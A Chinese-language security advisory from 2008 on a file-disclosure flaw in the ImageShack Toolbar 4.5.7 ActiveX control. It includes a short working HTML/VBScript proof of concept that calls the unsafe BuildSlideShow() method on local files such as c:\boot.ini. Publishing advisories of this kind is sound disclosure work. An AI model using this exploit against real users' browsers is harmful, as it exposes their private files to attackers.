ImageShack Toolbar ImageShackToolbar.dll控件不安全方式漏洞
发布日期:2008-01-24
更新日期:2008-01-28
受影响系统:ImageShack ImageShack Toolbar 4.5.7
描述:
BUGTRAQ ID:
27439
ImageShack Toolbar是用于向ImageShack网站上传文件的浏览器内嵌工具栏。
ImageShack Toolbar的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞获取系统文件。
ImageShack Toolbar所安装的ImageShackToolbar.FileUploader.1 ActiveX控件(ImageShackToolbar.dll)包含有不安全的BuildSlideShow()方式,允许攻击者在将用户系统上的特定图形文件上传到ImageShack站点,或通过网络嗅探器泄露非图形文件的内容。成功攻击要求攻击者知道目标文件的完整路径和文件名。
<*来源:rgod (
rgod@autistici.org)
链接:
http://secunia.com/advisories/28644/
http://marc.info/?l=bugtraq&m=120119162717734&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu' /></object>
<script language='vbscript'>
suntzu.BuildSlideShow "file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"
suntzu.BuildSlideShow "file:///c:\\boot.ini", "Big",1,"uhuhinterestingprivatethings","Fade","White"
</script>
</body>
</html>
建议:
厂商补丁:
ImageShack
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://reg.imageshack.us/浏览次数:2486
严重程度:0(网友投票)
